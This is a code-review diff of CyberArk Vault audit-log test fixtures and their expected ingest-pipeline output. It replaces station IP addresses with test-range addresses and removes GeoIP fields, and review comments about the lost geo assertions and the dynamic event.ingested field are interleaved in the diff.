{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n 
\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group 
Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_localhost.localdomain","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:58:01Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:01","IsoTimestamp":"2021-03-10T17:58:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T17:59:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:30","IsoTimestamp":"2021-03-10T17:59:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:17:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:15","IsoTimestamp":"2021-03-10T22:17:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMApp_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-10T22:19:16Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:16","IsoTimestamp":"2021-03-10T22:19:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 
Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMGw_ASR-WIN","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-11T16:59:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.13\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:38","IsoTimestamp":"2021-03-11T16:59:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_VAGRANT","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 
2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:17","IsoTimestamp":"2021-03-14T12:57:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_SSH","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n 
PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 67.43.156.15\n \n \n \n \n \n Add Group Member\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"PSMP_ADB_asr-cyberark-psm-ssh","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json index 7e45bbf278e..a1dd3cc9ca8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMPApp_localhost.localdomain", "source_user": "PSMAppUsers", 
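Review bot: The regenerated document for the first event no longer carries a `source.geo` object at all, whereas the old expected output asserted a full geolocation (continent, country, region, city, location) for the station address, so this test stops exercising the GeoIP enrichment that the previous fixture covered. Replacing real residential and cloud addresses in a committed fixture with the 67.43.156.0/24 test range is the right call; but if the audit pipeline still runs a geoip processor, confirm whether the GeoIP database used by the pipeline test resolves that range and, if it does, regenerate so that `source.geo` is asserted again. If no geo result is expected for these addresses, a one-line note in the test config or changelog such as `GeoIP enrichment is not asserted for the 67.43.156.0/24 test addresses` would stop the next reader from treating the dropped block as a regression. The same removal is repeated for every document in this file, so the decision applies to the whole fixture.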
@@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730009500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577462300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
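Review bot: `event.ingested` is a wall-clock value baked into the expected output (`2021-06-09…` replaced by `2021-12-09…` here and in every later hunk), so each regeneration of this fixture rewrites lines that assert nothing and buries the substantive change, which is the `Station` address inside `event.original`. As far as I recall, elastic-package pipeline test configs can declare such fields as dynamic so they are matched by pattern rather than by literal value: `dynamic_fields:` followed by `  event.ingested: ".*"` in the data stream's test `-config.yml`. With that in place the diff for this hunk would be only the `event.original` lines, which is what actually changed. If the config already declares this and the generator still emits the literal value, that is worth checking separately.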
@@ -74,20 +62,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -104,7 +80,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -112,7 +88,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMPGW_localhost.localdomain", "source_user": "PVWAGWAccounts", 
@@ -128,8 +104,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730026800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577470900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
@@ -141,20 +117,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -171,7 +135,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -179,7 +143,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:35Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMP_ADB_localhost.localdomain", "source_user": "PSMP_ADB_AppUsers", 
@@ -195,8 +159,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730031500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577476600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } 
